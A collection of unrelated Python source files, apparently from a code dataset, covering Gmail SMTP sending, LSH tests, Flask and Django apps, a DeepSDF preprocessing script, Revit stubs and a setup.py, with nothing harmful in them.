self.txt = MIMEText('Gentile ' + self.users_combo[self.recipientBox.currentIndex() - 1].name + ',\n'
+ self.textMail.toPlainText())
self.msg.attach(self.txt)
email_end = open('config/end_mail.html').read()
end = MIMEText(email_end, 'html')
self.msg.attach(end)
# Connessione con il Server
self.server = smtplib.SMTP('smtp.gmail.com', 587)
self.server.starttls()
self.server.login(self.sender_email, self.password)
print("Login success")
# Inoltro e-mail
self.server.sendmail(self.sender_email, self.rec_email, self.msg.as_string())
def refresh_text(self):
self.comunication.text = self.textMail.toPlainText()
self.comunicationM.set(self.comunication)
self.pop = Popup("Email predefinita aggiornata!")
self.pop.show()
# endregion
| 2.25 | 2 |
tests/test_lsh.py | simonemainardi/LSHash | 61 | 12761027 | <gh_stars>10-100
import random
import string
from unittest import TestCase
from redis import StrictRedis
from pprint import pprint
import sys
import os
# add the LSHash package to the current python path
sys.path.insert(0, os.path.abspath('../'))
# now we can use our lshash package and not the standard one
from lshash import LSHash
class TestLSHash(TestCase):
num_elements = 100
def setUp(self):
self.els = []
self.el_names = []
for i in range(self.num_elements):
el = [random.randint(0, 100) for _ in range(8)]
elname = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
self.els.append(tuple(el))
self.el_names.append(elname)
def test_lshash(self):
lsh = LSHash(6, 8, 1)
for i in range(self.num_elements):
lsh.index(list(self.els[i]))
lsh.index(list(self.els[i])) # multiple insertions
hasht = lsh.hash_tables[0]
itms = [hasht.get_list(k) for k in hasht.keys()]
for itm in itms:
assert itms.count(itm) == 1
for el in itm:
assert el in self.els
for el in self.els:
res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
# res is a tuple containing the vector and the distance
el_v, el_dist = res
assert el_v in self.els
assert el_dist == 0
del lsh
def test_lshash_extra_val(self):
lsh = LSHash(6, 8, 1)
for i in range(self.num_elements):
lsh.index(list(self.els[i]), self.el_names[i])
hasht = lsh.hash_tables[0]
itms = [hasht.get_list(k) for k in hasht.keys()]
for itm in itms:
for el in itm:
assert el[0] in self.els
assert el[1] in self.el_names
for el in self.els:
# res is a list, so we need to select the first entry only
res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
# vector an name are in the first element of the tuple res[0]
el_v, el_name = res[0]
# the distance is in the second element of the tuple
el_dist = res[1]
assert el_v in self.els
assert el_name in self.el_names
assert el_dist == 0
del lsh
def test_lshash_redis(self):
"""
Test external lshash module
"""
config = {"redis": {"host": 'localhost', "port": 6379, "db": 15}}
sr = StrictRedis(**config['redis'])
sr.flushdb()
lsh = LSHash(6, 8, 1, config)
for i in range(self.num_elements):
lsh.index(list(self.els[i]))
lsh.index(list(self.els[i])) # multiple insertions should be prevented by the library
hasht = lsh.hash_tables[0]
itms = [hasht.get_list(k) for k in hasht.keys()]
for itm in itms:
for el in itm:
assert itms.count(itm) == 1 # have multiple insertions been prevented?
assert el in self.els
for el in self.els:
res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
el_v, el_dist = res
assert el_v in self.els
assert el_dist == 0
del lsh
sr.flushdb()
def test_lshash_redis_extra_val(self):
"""
Test external lshash module
"""
config = {"redis": {"host": 'localhost', "port": 6379, "db": 15}}
sr = StrictRedis(**config['redis'])
sr.flushdb()
lsh = LSHash(6, 8, 1, config)
for i in range(self.num_elements):
lsh.index(list(self.els[i]), self.el_names[i])
lsh.index(list(self.els[i]), self.el_names[i]) # multiple insertions
hasht = lsh.hash_tables[0]
itms = [hasht.get_list(k) for k in hasht.keys()]
for itm in itms:
assert itms.count(itm) == 1
for el in itm:
assert el[0] in self.els
assert el[1] in self.el_names
for el in self.els:
res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
# vector an name are in the first element of the tuple res[0]
el_v, el_name = res[0]
# the distance is in the second element of the tuple
el_dist = res[1]
assert el_v in self.els
assert el_name in self.el_names
assert el_dist == 0
del lsh
sr.flushdb()
| 2.859375 | 3 |
tests/test_api.py | korvyashka/pykongregate | 0 | 12761028 | from unittest import TestCase
from mock import patch
from pykongregate.api import _handle_request
from pykongregate.exceptions import NullResponseException
class TestApi(TestCase):
def test_base_request(self):
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = ''
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
self.assertRaises(
NullResponseException,
_handle_request,
url, {},
)
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = '{"hello_world": "hello_world"}'
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
params = {}
response = _handle_request(url, params)
self.assertEqual(
response, {"hello_world": "hello_world"}
)
| 2.671875 | 3 |
chap03/author-manager/src/main.py | matadorchw/rest_flask | 2 | 12761029 | import logging
import sys
from flask import Flask, send_from_directory, jsonify
from flask_jwt_extended import JWTManager
from api.utils.database import db
from api.utils.responses import response_with
import api.utils.responses as resp
from api.utils.email import mail
from api.routes.authors import author_routes
from api.routes.books import book_routes
from api.routes.users import user_routes
from flask_swagger import swagger
from flask_swagger_ui import get_swaggerui_blueprint
def create_app(config):
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(author_routes, url_prefix='/api/authors')
app.register_blueprint(book_routes, url_prefix='/api/books')
app.register_blueprint(user_routes, url_prefix='/api/users')
SWAGGER_URL = '/api/docs'
swaggerui_blueprint = get_swaggerui_blueprint('/api/docs', '/api/spec',
config={
'app_name': "Flask Author DB"})
app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
@app.route('/avatar/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
@app.after_request
def add_header(response):
return response
@app.errorhandler(400)
def bad_request(e):
logging.error(e)
return response_with(resp.BAD_REQUEST_400)
@app.errorhandler(500)
def server_error(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_500)
@app.errorhandler(404)
def not_found(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_404)
@app.route('/api/spec')
def spec():
swag = swagger(app, prefix='/api')
swag['info']['base'] = "http://localhost:5000"
swag['info']['version'] = "1.0"
swag['info']['title'] = "Flask Author DB"
return jsonify(swag)
jwt = JWTManager(app)
mail.init_app(app)
db.init_app(app)
with app.app_context():
db.create_all()
logging.basicConfig(stream=sys.stdout,
format='%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s',
level=logging.DEBUG)
return app
if __name__ == '__main__':
import os
from api.config.config import ProductionConfig, TestingConfig, \
DevelopmentConfig
if os.environ.get('WORK_ENV') == 'PROD':
app_config = ProductionConfig
elif os.environ.get('WORK_ENV') == 'TEST':
app_config = TestingConfig
else:
app_config = DevelopmentConfig
app = create_app(app_config)
app.run(port=5000, host='0.0.0.0', use_reloader=True)
| 2.25 | 2 |
rewards/views.py | Ananth3A1/casuper25 | 1 | 12761030 | from django.http import Http404
from django.shortcuts import render, redirect
from users.models import Profile, Team
from .forms import MultiBadgeForm
from django.contrib.auth.decorators import login_required
from .models import Points
from webpages.models import Banner, Visibility
from webpages.utils import return_camp_id
@login_required
def give_award(request):
if request.user.is_superuser:
if request.method == 'GET':
form = MultiBadgeForm()
return render(request, 'award/give_award.html', context={'form': form})
else:
form = MultiBadgeForm(request.POST)
if form.is_valid():
users = form.cleaned_data.get('users')
teams = form.cleaned_data.get('teams')
heading = form.cleaned_data.get('heading')
pr_type = form.cleaned_data.get('type')
points = form.cleaned_data.get('points')
show = form.cleaned_data.get('show')
if len(users) != 0:
for user in users:
Points.objects.create(user=user, heading=heading, type=pr_type, points=points, show=show)
elif teams:
Points.objects.create(team=teams, heading=heading, type=pr_type, points=points, show=show)
return redirect('give_award')
else:
raise Http404()
# display the list of points given including only top 3
def award_list(request, camp):
camp_id = return_camp_id(camp)
awards = Points.objects.filter(show=True, camp=camp_id)
users = awards.filter(team=None)
teams = awards.filter(user=None)
display = Visibility.objects.filter(camp=camp_id).first().awards
image = Banner.objects.filter(camp=camp_id).first().awards
context = {
"teams": teams,
'users': users,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} AWARD LIST'
}
return render(request, 'award/award_list.html', context=context)
# show the leaderboard of teams and profiles use points in corresponding models to order
def leaderboard(request, camp):
camp_id = return_camp_id(camp)
team_profiles = ""
team_points = ""
profiles = Profile.objects.filter(camps=camp_id).order_by('-points')[:10]
teams = Team.objects.filter(camp=camp_id).order_by("-team_points")[:10]
if request.user.profile.team:
team_profiles = Profile.objects.filter(team=request.user.profile.team).order_by('-points')
team_points = Team.objects.get(id=request.user.profile.team.id)
display = Visibility.objects.filter(camp=camp_id).first().leaderboard
image = Banner.objects.filter(camp=camp_id).first().leaderboard
context = {
'profiles': profiles,
'teams': teams,
'team_profiles': team_profiles,
'team_details': team_points,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} LEADERBOARD'
}
return render(request, 'award/leaderboard.html', context=context)
| 2.109375 | 2 |
deepclaw/driver/arms/Inverse_Kinematics/ikpy/logs.py | Nokkxz/ME336-Yellow-Team-Project | 5 | 12761031 | # coding= utf8
import logging
logger = logging.getLogger("ikpy")
stream_handler = logging.StreamHandler()
logger.setLevel(logging.WARNING)
logger.addHandler(stream_handler)
def set_log_level(level):
logger.setLevel(level)
| 2.3125 | 2 |
sentence-reading/question_respondent.py | michalovsky/knowlegde-based-ai-mini-projects | 0 | 12761032 | <reponame>michalovsky/knowlegde-based-ai-mini-projects
from question_frame import QuestionFrame
from sentence_frame import SentenceFrame
def answer_question_about_sentence(question_frame: QuestionFrame, sentence_frame: SentenceFrame) -> str:
if "Who" in question_frame.question_words:
if len(question_frame.question_words) == 1:
return sentence_frame.subjects[0]
elif "with" in question_frame.question_words:
subject1 = sentence_frame.subjects[0]
subject2 = sentence_frame.subjects[1]
if subject1 in question_frame.subjects:
return subject2
return subject1
elif "to" in question_frame.question_words:
if sentence_frame.recipient:
return sentence_frame.recipient
else:
return sentence_frame.subjects[0]
if "What" in question_frame.question_words:
if len(question_frame.question_words) > 1 and len(sentence_frame.noun_adjectives) > 0:
return sentence_frame.noun_adjectives[0]
elif sentence_frame.noun is None:
return str(" ".join(sentence_frame.subjects))
return sentence_frame.noun
if "How" in question_frame.question_words:
if len(question_frame.question_words) == 1:
return sentence_frame.verb
if "far" in question_frame.question_words:
return sentence_frame.noun
if "much" in question_frame.question_words:
return sentence_frame.quantities
return sentence_frame.noun_adjectives[0]
if "Where" in question_frame.question_words:
return sentence_frame.location
if "time" in question_frame.question_words:
return sentence_frame.time
return "" | 3.28125 | 3 |
display-stuff/neopixels/text/text/testText.py | flashypepo/myMicropython-Examples | 3 | 12761033 | <filename>display-stuff/neopixels/text/text/testText.py
# testText.py - test fontbitmap and font5*8.bin
# 2017_0206 PePo new, it doesnot work. Font too big (5*8?) for Featherwing Neopixel
# GitHub: https://github.com/adafruit/micropython-adafruit-bitmap-font/releases
import neopixel
import machine
# 2016_0206: Featherwing NeoPixel connected to Feather Huzzah ESP8266 at GPIO15
DISPLAY_WIDTH = 8
DISPLAY_HEIGTH = 4
DIN_PIN = 15
matrix = neopixel.NeoPixel(machine.Pin(DIN_PIN, machine.Pin.OUT), DISPLAY_WIDTH * DISPLAY_HEIGTH)
# pixel function
def matrix_pixel(x, y, color):
#matrix[y * 8 + x] = color #ERROR: index out of range
matrix[y * 4 + x] = color #wrong character
# create bitmapfont
import bitmapfont
bf = bitmapfont.BitmapFont(8, 4, matrix_pixel)
bf.init()
# draw some text
bf.text('1', 0, 0, (50, 0, 50))
matrix.write()
| 2.59375 | 3 |
dodo_commands/extra/dodo_standard_commands/autostart.py | mnieber/dodo-commands | 8 | 12761034 | import os
from argparse import ArgumentParser
from dodo_commands import Dodo
def _args():
parser = ArgumentParser(
description=(
"Writes (or removes) a small script that activates the latest "
+ "Dodo Commands project"
)
)
parser.add_argument("status", choices=["on", "off"])
return Dodo.parse_args(parser)
if Dodo.is_main(__name__, safe=False):
args = _args()
for shell, activate_cmd in (
("bash", "$(dodo env --latest --shell=bash) &&"),
("fish", "eval (dodo env --latest --shell=fish); and"),
):
confd_dir = os.path.expanduser("~/.config/%s/conf.d" % shell)
if not os.path.exists(confd_dir):
Dodo.run(["mkdir", "-p", confd_dir])
script = os.path.join(confd_dir, "dodo_autostart." + shell)
if args.status == "on" and not os.path.exists(script):
with open(script, "w") as f:
f.write("# NOTE: automatically generated file, don't edit.\n")
f.write("%s dodo check-version --dodo --config\n" % activate_cmd)
if args.status == "off" and os.path.exists(script):
os.unlink(script)
| 2.71875 | 3 |
src/netbox_example/tables.py | steffann/netbox-example-plugin | 4 | 12761035 | <gh_stars>1-10
from django_tables2 import LinkColumn, TemplateColumn
from utilities.tables import BaseTable, ToggleColumn
from .models import DeviceExample, Example
#
# Examples
#
class ExampleTable(BaseTable):
pk = ToggleColumn()
actions = TemplateColumn(
template_name='netbox_example/example_buttons.html',
attrs={
'td': {
'class': 'text-right noprint'
}
},
verbose_name=''
)
class Meta(BaseTable.Meta):
model = Example
fields = ('pk', 'name', 'value')
class DeviceExampleTable(BaseTable):
pk = ToggleColumn()
device = LinkColumn()
actions = TemplateColumn(
template_name='netbox_example/deviceexample_buttons.html',
attrs={
'td': {
'class': 'text-right noprint'
}
},
verbose_name=''
)
class Meta(BaseTable.Meta):
model = DeviceExample
fields = ('pk', 'device', 'name')
| 2.09375 | 2 |
examples/maps.py | vpreston/jetyak-parsing | 0 | 12761036 | import numpy as np
import jetyak
import jviz
import sensors
import shapefile
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import utm
from mpl_toolkits.basemap import Basemap
import mpl_toolkits.basemap as mb
from scipy import stats
def lat2str(deg):
min = 60 * (deg - np.floor(deg))
deg = np.floor(deg)
dir = 'N'
if deg < 0:
if min != 0.0:
deg += 1.0
min -= 60.0
dir = 'S'
return ("%d$\degree$ %g' N") % (np.abs(deg),np.abs(min))
def lon2str(deg):
min = 60 * (deg - np.floor(deg))
deg = np.floor(deg)
dir = 'E'
if deg < 0:
if min != 0.0:
deg += 1.0
min -= 60.0
dir = 'W'
return ("%d$\degree$ %g' W") % (np.abs(deg),np.abs(min))
if __name__ == '__main__':
#69.121595, -105.019215
base = Basemap(llcrnrlon=-170, llcrnrlat=0, urcrnrlon=-30, urcrnrlat=80,
resolution='l', projection='merc', suppress_ticks=True)
# base = Basemap(llcrnrlon=-120, llcrnrlat=68, urcrnrlon=-100, urcrnrlat=74,
# resolution='h', projection='merc', suppress_ticks=True)
# base.arcgisimage(service='World_Topo_Map', xpixels=1500, verbose=True)
base.drawcoastlines()
base.drawcountries()
# base.drawlakes()
# base.fillcontinents(color='coral',lake_color='aqua')
# base.drawlsmask(land_color='coral', ocean_color='aqua', lakes=True)
# base.drawparallels(np.arange(-80.,81.,2.),labels=[True,True,False,False],dashes=[2,2],color='white')
# base.drawmeridians(np.arange(-180.,181.,10.),labels=[True,True,True,False],dashes=[2,2],color='white')
# base.drawmapboundary(fill_color='aqua')
# base.drawrivers(linewidth=0.5, linestyle='solid', color='blue')
base.drawparallels(np.arange(-90.,91.,10.),labels=[True,True,False,False],dashes=[2,2],color='white')
base.drawmeridians(np.arange(-180.,181.,30.),labels=[False,False,False,True],dashes=[2,2],color='white')
base.drawparallels(np.arange(66.,67., 100.),labels=[False,False,False,True],dashes=[2,2],color='red')
base.drawstates(linewidth=2., color='grey')
base.bluemarble()
plt.show()
# base.scatter(dock_reference[1], dock_reference[0], s=500, marker='*', label='Freshwater Creek Mouth', zorder=10, edgecolor='k', facecolor='r')
# for radius in [500*i for i in range(10)]:
# lats, lons = getCircle(dock_reference[0], dock_reference[1], radius)
# base.plot(lons, lats, c='grey')
# if radius == 0:
# pass
# # plt.gca().annotate('Embayment', xy=(lons[270], lats[270]+0.001), xytext=(lons[270]+0.0005, lats[270]+0.002), fontsize=22, ha='center')
# # plt.gca().annotate('Freshwater Creek Mouth', xy=(lons[270], lats[270]+0.0005), fontsize=10, ha='right')
# else:
# plt.gca().annotate(str(radius)+'m', xy=(lons[270], lats[270]+0.0003), fontsize=22, ha='center')
# colors = np.flip(plt.cm.viridis(np.linspace(0,1,5)), axis=0)
# for i, m in enumerate(jy.mission[0:5]):
# base.scatter(m['Longitude'], m['Latitude'], label=date_labels[i], s=1, c=colors[i], zorder=10-i, lw=0)
# lgnd = plt.legend(loc='upper left')
# for handle in lgnd.legendHandles[1:]:
# handle.set_sizes([200])
# ax = plt.gca()
# def xformat(x, pos=None): return lon2str(x)
# def yformat(x, pos=None): return lat2str(x)
# ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(xformat))
# ax.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(yformat))
# plt.show()
# plt.close() | 2.40625 | 2 |
losses/shrinkage.py | cvpr22sub7201/SpeechDrivenTongueAnimation | 1 | 12761037 | # -*- coding: utf-8 -*-
"""
ShrinkageLoss
"""
import torch
import torch.nn as nn
class ShrinkageLoss(nn.Module):
""" ShrinkageLoss class.
Modified version of shrinkage loss tailored to images:
http://openaccess.thecvf.com/content_ECCV_2018/papers/Xiankai_Lu_Deep_Regression_Tracking_ECCV_2018_paper.pdf
It basically computes a point-wise shrinkage loss.
"""
def __init__(self, speed=10.0, loc=0.2, verbose=False):
""" Initialize ShrinkageLoss class with user-defined parameters.
Arguments:
shrink_speed (float): Shrinkage speed, i.e., weight assigned to hard samples.
shrink_loc (float): Shrinkage localization, i.e., threshold for hard mining.
verbose (bool): Whether the log will be shown in the shell.
"""
nn.Module.__init__(self)
self.shrink_speed = speed
self.shrink_loc = loc
def forward(self, estimate, ground_truth):
""" Calculate shrinkage loss between the estimate and grount truth, if any.
Otherwise, the loss is computed using the estimate, which is already
the difference to the ground truth or the parameters.
Arguments:
estimate (tensor): Estimate or delta (MxC, where M, C are
the number of points and channels, respectively).
ground_truth (tensor): Ground truth (optional). MxC, where M, C are
the number of points and channels, respectively
Return:
Mean per-point shrinkage loss (float)
"""
# Compute point errors (l2 norm).
l2_loss = torch.norm(estimate - ground_truth, p=2, dim=1)
# Compute mean shrinkage loss.
shrink_loss = torch.mul(l2_loss,l2_loss)/(
1.0 + torch.exp(self.shrink_speed*(self.shrink_loc - l2_loss)))
return torch.mean(shrink_loss) | 3.1875 | 3 |
release/stubs.min/Autodesk/Revit/DB/__init___parts/FloorType.py | YKato521/ironpython-stubs | 0 | 12761038 | class FloorType(HostObjAttributes, IDisposable):
""" An object that specifies the type of a floor in Autodesk Revit. """
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def getBoundingBox(self, *args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def setElementType(self, *args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
IsFoundationSlab = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns whether the element FloorAttributes type is FoundationSlab.
Get: IsFoundationSlab(self: FloorType) -> bool
"""
StructuralMaterialId = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns the identifier of the material that defines the element's structural analysis properties.
Get: StructuralMaterialId(self: FloorType) -> ElementId
Set: StructuralMaterialId(self: FloorType)=value
"""
ThermalProperties = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The calculated and settable thermal properties of the FloorType
Get: ThermalProperties(self: FloorType) -> ThermalProperties
"""
| 2.140625 | 2 |
server/processes/serializers/workflow_task_instance_execution_serializer.py | CloudReactor/task_manager | 0 | 12761039 | import logging
from rest_framework import serializers
from rest_flex_fields.serializers import FlexFieldsSerializerMixin
from ..models import WorkflowTaskInstanceExecution
from .workflow_task_instance_execution_base_serializer import WorkflowTaskInstanceExecutionBaseSerializer
from .serializer_helpers import SerializerHelpers
from .task_execution_serializer import TaskExecutionSerializer
logger = logging.getLogger(__name__)
class WorkflowTaskInstanceExecutionSerializer(SerializerHelpers,
FlexFieldsSerializerMixin, WorkflowTaskInstanceExecutionBaseSerializer):
"""
WorkflowTaskInstanceExecutions hold the execution information
for a WorkflowTaskInstance (which holds a Task) for a specific
WorkflowExection (run of a Workflow).
"""
class Meta:
model = WorkflowTaskInstanceExecution
fields = ('uuid', 'workflow_execution',
'workflow_task_instance', 'task_execution',
'is_latest', 'created_at')
read_only_fields = [
'uuid', 'workflow_execution',
'workflow_task_instance', 'task_execution',
'is_latest', 'created_at',
]
task_execution = TaskExecutionSerializer(read_only=True)
| 2.234375 | 2 |
preprocess_dir.py | yushiangw/DeepSDF | 0 | 12761040 | <reponame>yushiangw/DeepSDF
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import argparse
import concurrent.futures
import json
import logging
import os
import subprocess
import glob
import deep_sdf
import deep_sdf.workspace as ws
def filter_classes_glob(patterns, classes):
import fnmatch
passed_classes = set()
for pattern in patterns:
passed_classes = passed_classes.union(
set(filter(lambda x: fnmatch.fnmatch(x, pattern), classes))
)
return list(passed_classes)
def filter_classes_regex(patterns, classes):
import re
passed_classes = set()
for pattern in patterns:
regex = re.compile(pattern)
passed_classes = passed_classes.union(set(filter(regex.match, classes)))
return list(passed_classes)
def filter_classes(patterns, classes):
if patterns[0] == "glob":
return filter_classes_glob(patterns, classes[1:])
elif patterns[0] == "regex":
return filter_classes_regex(patterns, classes[1:])
else:
return filter_classes_glob(patterns, classes)
def process_mesh(mesh_filepath, target_filepath, executable, additional_args):
logging.info(mesh_filepath + " --> " + target_filepath)
command = [executable, "-m", mesh_filepath, "-o", target_filepath] + additional_args
subproc = subprocess.Popen(command, stdout=subprocess.DEVNULL)
subproc.wait()
def append_data_source_map(data_dir, name, source):
data_source_map_filename = ws.get_data_source_map_filename(data_dir)
print("data sources stored to " + data_source_map_filename)
data_source_map = {}
if os.path.isfile(data_source_map_filename):
with open(data_source_map_filename, "r") as f:
data_source_map = json.load(f)
if name in data_source_map:
if not data_source_map[name] == os.path.abspath(source):
raise RuntimeError(
"Cannot add data with the same name and a different source."
)
else:
data_source_map[name] = os.path.abspath(source)
with open(data_source_map_filename, "w") as f:
json.dump(data_source_map, f, indent=2)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description="Pre-processes data from a data source and append the results to "
+ "a dataset.",
)
arg_parser.add_argument(
"--dest_dir",
"-d",
dest="dest_dir",
required=True,
help="The directory which holds all preprocessed data.",
)
arg_parser.add_argument(
"--source",
"-s",
dest="source_dir",
required=True,
help="The directory which holds the data to preprocess and append.",
)
arg_parser.add_argument(
"--skip",
dest="skip",
default=False,
action="store_true",
help="If set, previously-processed shapes will be skipped",
)
arg_parser.add_argument(
"--threads",
dest="num_threads",
default=8,
help="The number of threads to use to process the data.",
)
deep_sdf.add_common_args(arg_parser)
args = arg_parser.parse_args()
deep_sdf.configure_logging(args)
deepsdf_dir = os.path.dirname(os.path.abspath(__file__))
executable = os.path.join(deepsdf_dir, "bin/PreprocessMesh_v2")
assert os.path.exists(executable), executable
extension = ".npz"
# save directory
dest_dir = args.dest_dir
logging.info(
"Preprocessing data from "
+ args.source_dir
+ " and placing the results in "
+ dest_dir
)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
#if args.surface_sampling:
# normalization_param_dir = os.path.join(
# args.data_dir, ws.normalization_param_subdir, args.source_name
# )
# if not os.path.isdir(normalization_param_dir):
# os.makedirs(normalization_param_dir)
#append_data_source_map(args.data_dir, args.source_name, args.source_dir)
#class_directories = split[args.source_name]
#
meshes_targets_and_specific_args = []
#for class_dir in class_directories:
if 1:
specific_args = [ '-s', '100000' , '--ft']
flist = glob.glob( os.path.join(args.source_dir,'*.ply'))
flist.sort()
logging.debug( "Processing " + str(len(flist)) )
for inst_fp in flist:
mid = os.path.basename(inst_fp).split('.')[0]
processed_filepath = os.path.join(dest_dir, mid+'.npz')
meshes_targets_and_specific_args.append(
( inst_fp,
processed_filepath,
specific_args,
)
)
with concurrent.futures.ThreadPoolExecutor(
max_workers=int(args.num_threads) ) as executor:
for ( mesh_filepath,
target_filepath,
specific_args,
) in meshes_targets_and_specific_args:
executor.submit(
process_mesh,
mesh_filepath,
target_filepath,
executable,
specific_args ,
)
executor.shutdown()
| 2.140625 | 2 |
temp_models/trimet_gis_models.py | hackoregon/provisional-transportation-api | 2 | 12761041 | <reponame>hackoregon/provisional-transportation-api
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class TmBoundary(models.Model):
ogc_fid = models.AutoField(primary_key=True)
area_sq_mi = models.FloatField(blank=True, null=True)
acres = models.FloatField(blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_boundary'
class TmParkride(models.Model):
ogc_fid = models.AutoField(primary_key=True)
name = models.CharField(max_length=-1, blank=True, null=True)
address = models.CharField(max_length=-1, blank=True, null=True)
city = models.CharField(max_length=-1, blank=True, null=True)
county = models.CharField(max_length=-1, blank=True, null=True)
zipcode = models.CharField(max_length=-1, blank=True, null=True)
owner = models.CharField(max_length=-1, blank=True, null=True)
spaces = models.IntegerField(blank=True, null=True)
status = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_parkride'
class TmRailLines(models.Model):
ogc_fid = models.AutoField(primary_key=True)
type = models.CharField(max_length=-1, blank=True, null=True)
line = models.CharField(max_length=-1, blank=True, null=True)
passage = models.CharField(max_length=-1, blank=True, null=True)
status = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_rail_lines'
class TmRailStops(models.Model):
ogc_fid = models.AutoField(primary_key=True)
station = models.CharField(max_length=-1, blank=True, null=True)
type = models.CharField(max_length=-1, blank=True, null=True)
line = models.CharField(max_length=-1, blank=True, null=True)
status = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_rail_stops'
class TmRouteStops(models.Model):
ogc_fid = models.AutoField(primary_key=True)
rte = models.IntegerField(blank=True, null=True)
dir = models.IntegerField(blank=True, null=True)
rte_desc = models.CharField(max_length=-1, blank=True, null=True)
dir_desc = models.CharField(max_length=-1, blank=True, null=True)
type = models.CharField(max_length=-1, blank=True, null=True)
stop_seq = models.IntegerField(blank=True, null=True)
stop_id = models.IntegerField(blank=True, null=True)
stop_name = models.CharField(max_length=-1, blank=True, null=True)
jurisdic = models.CharField(max_length=-1, blank=True, null=True)
zipcode = models.CharField(max_length=-1, blank=True, null=True)
frequent = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_route_stops'
class TmRoutes(models.Model):
ogc_fid = models.AutoField(primary_key=True)
rte = models.IntegerField(blank=True, null=True)
dir = models.IntegerField(blank=True, null=True)
rte_desc = models.CharField(max_length=-1, blank=True, null=True)
public_rte = models.CharField(max_length=-1, blank=True, null=True)
dir_desc = models.CharField(max_length=-1, blank=True, null=True)
frequent = models.CharField(max_length=-1, blank=True, null=True)
type = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_routes'
class TmStops(models.Model):
ogc_fid = models.AutoField(primary_key=True)
stop_id = models.IntegerField(blank=True, null=True)
stop_name = models.CharField(max_length=-1, blank=True, null=True)
jurisdic = models.CharField(max_length=-1, blank=True, null=True)
zipcode = models.CharField(max_length=-1, blank=True, null=True)
type = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_stops'
class TmTranCen(models.Model):
ogc_fid = models.AutoField(primary_key=True)
name = models.CharField(max_length=-1, blank=True, null=True)
address = models.CharField(max_length=-1, blank=True, null=True)
city = models.CharField(max_length=-1, blank=True, null=True)
county = models.CharField(max_length=-1, blank=True, null=True)
zipcode = models.CharField(max_length=-1, blank=True, null=True)
status = models.CharField(max_length=-1, blank=True, null=True)
wkb_geometry = models.GeometryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'tm_tran_cen'
| 2.15625 | 2 |
setup.py | kkiran9/Affinity-model | 0 | 12761042 | <filename>setup.py
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
from subprocess import check_call
class PostDevelopCommand(develop):
"""Post-installation for development mode."""
def run(self):
check_call('python -m spacy download en'.split())
check_call('python -m spacy download en_core_web_sm'.split())
develop.run(self)
class PostInstallCommand(install):
"""Post-installation for installation mode."""
def run(self):
check_call('python -m spacy download en'.split())
check_call('python -m spacy download en_core_web_sm'.split())
install.run(self)
setup(
name='openreview-expertise',
version='0.1',
description='OpenReview paper-reviewer affinity modeling',
url='https://github.com/iesl/openreview-evidence',
author='<NAME>, <NAME>',
author_email='<EMAIL>, <EMAIL>',
license='MIT',
packages=[
'expertise'
],
install_requires=[
'openreview-py>=1.0.1',
'numpy',
'pandas',
'nltk',
'gensim',
'torch',
'cloudpickle',
'scikit-learn',
'tqdm',
'pytorch_pretrained_bert',
'ipdb',
'spacy',
'python-Levenshtein',
'allennlp',
